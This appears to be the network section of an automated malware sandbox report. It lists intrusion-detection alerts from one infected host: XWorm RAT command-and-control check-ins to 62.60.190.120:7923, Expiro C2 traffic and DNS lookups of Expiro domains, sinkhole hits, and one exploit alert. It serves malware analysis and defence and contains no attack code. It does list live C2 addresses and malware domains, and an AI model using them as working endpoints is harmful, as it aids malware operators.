                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:40.212666+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:45.746051+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:46.016418+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:46.018377+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:55.277577+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.849745TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:55.277577+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.849745TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:57.508298+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:57.510611+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:58.310559+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.849749TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:58.310559+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.849749TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:00.925861+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.849752TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:00.925861+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.849752TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:00.958134+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.849753TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:00.958134+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.849753TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:09.007426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:09.009008+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:09.222987+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.849771TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:09.222987+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.849771TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:10.211554+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:10.211554+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:12.472558+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849776TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:13.550781+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.849779TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:13.550781+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.849779TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:16.544350+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.849785TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:16.544350+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.849785TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:19.927368+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.849790TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:19.927368+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.849790TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:20.520085+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:20.522968+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:25.548314+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.84980018.246.231.12080TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:26.569235+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.849802TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:26.569235+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.849802TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:32.007656+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:32.009895+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:40.219750+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:40.219750+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:41.663178+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:41.666370+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:43.077139+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:43.079937+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:43.880385+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.8583901.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:47.228047+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:47.232962+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:50.122258+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:50.165460+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:58.632852+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:24:58.639056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:01.435276+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.8579931.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:04.039444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:04.041691+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:04.581923+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.8619891.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.054397+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.059508+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.215574+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:10.215574+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:11.952862+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.8507111.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:19.683653+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.8576341.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:21.733062+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:21.736445+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:22.898815+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:22.900401+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:28.114246+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.85017118.141.10.10780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:29.600322+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.8557301.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:32.758382+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:32.760012+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.695443+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.701299+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.756603+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.758283+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.845956+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:33.848152+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:36.645562+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.8621171.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.436954+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.439810+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.957726+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.957995+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.959728+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.965053+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:39.986938+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.053200+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.8503551.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.218338+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.218338+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.229253+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.231794+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.562090+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.562370+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.563650+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:40.568793+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:45.476852+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.8574711.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:47.288526+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:47.290307+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:55.505583+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.8602531.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:55.804685+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:55.806711+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:55.955396+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:55.961031+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:25:56.877353+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.8607911.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:07.319657+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:07.321143+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:10.211450+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:10.211450+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:10.393172+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.8606841.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:11.008160+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:11.013950+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:22.510398+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:22.514173+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:26.920870+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:26.926028+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:27.017207+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.8498461.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:27.080118+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:27.085713+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:27.901947+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.8537061.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:32.085586+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:32.087557+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:32.234668+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:32.236395+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:40.211588+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:40.211588+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:42.366975+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:42.387927+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:42.516224+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:42.517884+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:47.698015+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.85626882.112.184.19780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:53.944899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:53.946613+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:58.429742+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:26:58.431917+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:10.122699+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:10.198646+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:10.271854+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:10.271854+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:15.195764+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:15.197934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:17.585568+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:17.587127+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:19.507877+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:19.511336+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:31.101255+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:31.112355+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84972762.60.190.1207923TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:40.214322+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:40.214322+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2162.60.190.1207923192.168.2.849727TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:27:42.648419+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP

                                                                                                                                                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.227438927 CET49706443192.168.2.8188.114.97.3
